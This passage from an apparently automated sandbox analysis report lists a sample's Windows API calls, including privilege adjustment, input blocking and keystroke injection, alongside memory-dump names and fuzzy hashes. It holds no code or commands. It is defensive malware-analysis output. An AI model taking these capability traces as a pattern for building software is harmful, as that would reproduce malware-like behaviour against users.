• Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 88eb1f8115306b7efdbc0460ea14270001452fd54937ba1d73828eaddfdd1f70
• Instruction ID: 860fe1091a5170ceca49bf5c4ddaa63c5cd0b47585db6e2913d739b6ca33a9a9
• Opcode Fuzzy Hash: 88eb1f8115306b7efdbc0460ea14270001452fd54937ba1d73828eaddfdd1f70
• Instruction Fuzzy Hash: AE31C375911218ABCB21DF64D888B9DBBF8AF18310F5041EAE81CA6260E7349F818F44
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001), ref: 00C151DA
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C15238
• SetErrorMode.KERNEL32(00000000), ref: 00C152A1
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: bc35fd018812ab02f58b09bd5c15232dc8ad12ca0f12d26b566bdd0542a47ad9
• Instruction ID: ecea70beacaaa79f7df76143a708c9f9be3731f2a383d412937c24a950147f80
• Opcode Fuzzy Hash: bc35fd018812ab02f58b09bd5c15232dc8ad12ca0f12d26b566bdd0542a47ad9
• Instruction Fuzzy Hash: B8310975A10518DFDB00DF54D884BADBBB4FF49314F048099E805AB2A2DB32E956DB90
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00BBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0668
  • Part of subcall function 00BBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0685
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
• GetLastError.KERNEL32 ref: 00C0174A
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
• Opcode ID: 44aa795e7d4851a093d4b76381b665073208e49fcea0093dd7071736244021d8
• Instruction ID: 55c46544654ab315dcf84bd73a3fbce8df2d2fbc46b906f222ddf6ba6cd26f5a
• Opcode Fuzzy Hash: 44aa795e7d4851a093d4b76381b665073208e49fcea0093dd7071736244021d8
• Instruction Fuzzy Hash: 1611BCB2414205AFD718AF54DCC6EBEB7F9EB04714B24852EE46652281EBB0BC41CB20
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C0D608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C0D645
• CloseHandle.KERNEL32(?), ref: 00C0D650
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: 150d29fcee0224a9030ad4fa32ca7ee93fc34c3fdac2695aec24fba3db9b25a7
• Instruction ID: b0b3befe03c5f93058165c503aa83b9ab5f4b1bbce6d1eb59b29548eb503dee6
• Opcode Fuzzy Hash: 150d29fcee0224a9030ad4fa32ca7ee93fc34c3fdac2695aec24fba3db9b25a7
• Instruction Fuzzy Hash: B7118E71E01228BFDB108F95DC84FAFBBBCEB45B60F108111F914F7290C2704A018BA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C0168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C016A1
• FreeSid.ADVAPI32(?), ref: 00C016B1
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 7619bd968ccefae144ff6a5a084b0c2576cbb882c0fa5802a98d86747e89ab96
• Instruction ID: 79c4aea2ca6bae88156152c71e2be5ab9ab550ee019f5d7d1467c955376ad831
• Opcode Fuzzy Hash: 7619bd968ccefae144ff6a5a084b0c2576cbb882c0fa5802a98d86747e89ab96
• Instruction Fuzzy Hash: 03F0F47195030DFBDB00DFE4DD89AAEBBBCEB08704F504565E901E2181E774AA448B50
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID:
• String ID: /
• API String ID: 0-2043925204
• Opcode ID: 69f8fbf7ef2df067a9bd98f25050e52c8e3c7fa2489712fa182f51e7ab8126cb
• Instruction ID: 8d783af19e5fa6bbb9700a5a6c9e58725aa77ed95a588a0135b61d8dd0d34d85
• Opcode Fuzzy Hash: 69f8fbf7ef2df067a9bd98f25050e52c8e3c7fa2489712fa182f51e7ab8126cb
• Instruction Fuzzy Hash: 8041287650021A6FCB249FB9CC89EBBBBF8EB84314F1042AAF905D7280F6709D41CB54
Uniqueness

Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00BFD28C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID: X64
                                                                      • API String ID: 2645101109-893830106
                                                                      • Opcode ID: 2e3fbde773c5e97a32f94a0b61788dcaf3c8cd970739fd9dd6c995ec135414bd
                                                                      • Instruction ID: 92bfef09a426d9a78583d7640dead04c39f90e8eb9bee6094f53b2254deefecb
                                                                      • Opcode Fuzzy Hash: 2e3fbde773c5e97a32f94a0b61788dcaf3c8cd970739fd9dd6c995ec135414bd
                                                                      • Instruction Fuzzy Hash: F5D0C9B481111DEBCB94DB90DCC8EEDB7BCBB04305F100191F106A2000D77495488F10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                      • Instruction ID: 28fd9abe0a919ddc4f8c218714fc4689e0a8bd6f737a7ffd3d81ef58f0a28711
                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                      • Instruction Fuzzy Hash: 16021C71E002199BDF14CFA9C880BAEBBF1EF58314F2581ADD819E7384D731AE458B94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C16918
                                                                      • FindClose.KERNEL32(00000000), ref: 00C16961
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 6a09158affe7b5c88b531b5060860b91d8bffba1f62e5765764420a2fb296663
                                                                      • Instruction ID: 15d95bcd99a590975185353f0d4f88ddd60639b916c9ff7e11de74a72ddaebab
                                                                      • Opcode Fuzzy Hash: 6a09158affe7b5c88b531b5060860b91d8bffba1f62e5765764420a2fb296663
                                                                      • Instruction Fuzzy Hash: 811193316142109FC710DF29D484A5ABBE5FF85328F14C699E4698F3A2C731EC45CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C24891,?,?,00000035,?), ref: 00C137E4
                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C24891,?,?,00000035,?), ref: 00C137F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: d585da721279ba12508e538fcbc0d0adfc0db0faf1efc3ffae3d6a346fc56def
                                                                      • Instruction ID: 762ffaaf9163f1779aaff96240948d3e5bb0d377f0e395aff6cf49adb1871a38
                                                                      • Opcode Fuzzy Hash: d585da721279ba12508e538fcbc0d0adfc0db0faf1efc3ffae3d6a346fc56def
                                                                      • Instruction Fuzzy Hash: 11F0E5B16043286AE720176A8C8DFEF3AAEEFC5765F000175F509E22D1DA609D44C7F0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00C0B25D
                                                                      • keybd_event.USER32 ref: 00C0B270
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: InputSendkeybd_event
                                                                      • String ID:
                                                                      • API String ID: 3536248340-0
                                                                      • Opcode ID: cb36356681be86a67f36abcfd8d3976367fed667c19a9ec1d6a3d7f6581646e2
                                                                      • Instruction ID: a6d2353ff202d016ed39fb72d6e44f9dd1fdde587f1cf563bd503d639aa6cb50
                                                                      • Opcode Fuzzy Hash: cb36356681be86a67f36abcfd8d3976367fed667c19a9ec1d6a3d7f6581646e2
                                                                      • Instruction Fuzzy Hash: B5F0177181428EABDB05DFA1C806BAE7BB4FF08309F00800AF965A61A2C3798611DF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C011FC), ref: 00C010D4
                                                                      • CloseHandle.KERNEL32(?), ref: 00C010E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: c2353009076010f354130cc7363752c87e8d3cd82c5935bd90cb7c24a07a008e
                                                                      • Instruction ID: 6ded50b1da2994825cf9fa37c1cd15e144fde1ffb9dbf13330cd15b5a9227d64
                                                                      • Opcode Fuzzy Hash: c2353009076010f354130cc7363752c87e8d3cd82c5935bd90cb7c24a07a008e
                                                                      • Instruction Fuzzy Hash: CEE0BF72014611AFE7252B51FC45FBB77E9EB04320B14886DF5A5904B1DBA2ACA0DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Variable is not of type 'Object'., xrefs: 00BF0C40
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable is not of type 'Object'.
                                                                      • API String ID: 0-1840281001
                                                                      • Opcode ID: 774871be14f6d7bdf54b91a05e1ca271a285fea1a229e5d1f118c11a74e461f4
                                                                      • Instruction ID: 1563426346c9d7938c9b85ca076f03f62d88bdf226c105a1401eb40f85b63c03
                                                                      • Opcode Fuzzy Hash: 774871be14f6d7bdf54b91a05e1ca271a285fea1a229e5d1f118c11a74e461f4
                                                                      • Instruction Fuzzy Hash: CC3259749182189FCF14EF94C981AFDBBF5FF06304F1440A9E906AB292DB75AD49CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BD6766,?,?,00000008,?,?,00BDFEFE,00000000), ref: 00BD6998
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: 944870938bd24d35eca142689e128dcebe3c8a702b520325399446ff924ffef7
                                                                      • Instruction ID: e9b5acdc3b6853882e5f07dd56f154b7846074604275e1f5e335af621087ae34
                                                                      • Opcode Fuzzy Hash: 944870938bd24d35eca142689e128dcebe3c8a702b520325399446ff924ffef7
                                                                      • Instruction Fuzzy Hash: A4B14C316106099FD719CF28C486B65BBE0FF45364F25869AE8D9CF3A2D336E981CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: e0b042af28943c07063699c8face7394b0d322b940f9933f7b9669219b598f06
                                                                      • Instruction ID: 4a9c044e6eef2c703a70df0bf3c0440b3cdd1067a22336fdf59d58923134fe82
                                                                      • Opcode Fuzzy Hash: e0b042af28943c07063699c8face7394b0d322b940f9933f7b9669219b598f06
                                                                      • Instruction Fuzzy Hash: 1A126E759002299BCB24CF58C881BFEB7F5FF48710F14819AE949EB251DBB09A85CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
                                                                      • Opcode ID: fc4e50c2d0e0806b3ce235c9b49372ef77cea628ba001766913906425c4dee6f
                                                                      • Instruction ID: 1dff74346acff82de6c61ebf0c9c9771448e0f2e6aa2bf0bdd5e56e93d1dc639
                                                                      • Opcode Fuzzy Hash: fc4e50c2d0e0806b3ce235c9b49372ef77cea628ba001766913906425c4dee6f
                                                                      • Instruction Fuzzy Hash: 48E04F322142049FC710EF6AD855E9AFBE9AF99760F00845AFC4AD7351DB70E8809B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction ID: 909d1e8ae6773ba9af078ce6fce3428f448a365029cb7d423f1363590ce52568
                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction Fuzzy Hash: 0D516A716CC6056BDF38862A889DFBE23D5DB12340F1805DDEA86D7282CE61DE01DF66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c962464e4a37df8790d947ccb5fdda6489dcd1f7f3d218ccfd73a76da3220204
                                                                      • Instruction ID: a6a3691b097ec5e56e52cdef9cf7b512d3909555b1afdf80ead77f863a4a93e7
                                                                      • Opcode Fuzzy Hash: c962464e4a37df8790d947ccb5fdda6489dcd1f7f3d218ccfd73a76da3220204
                                                                      • Instruction Fuzzy Hash: F7322226D69F014DD7239634D822339A689AFB73C5F55C737F81AB5AAAFF29C4834100
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
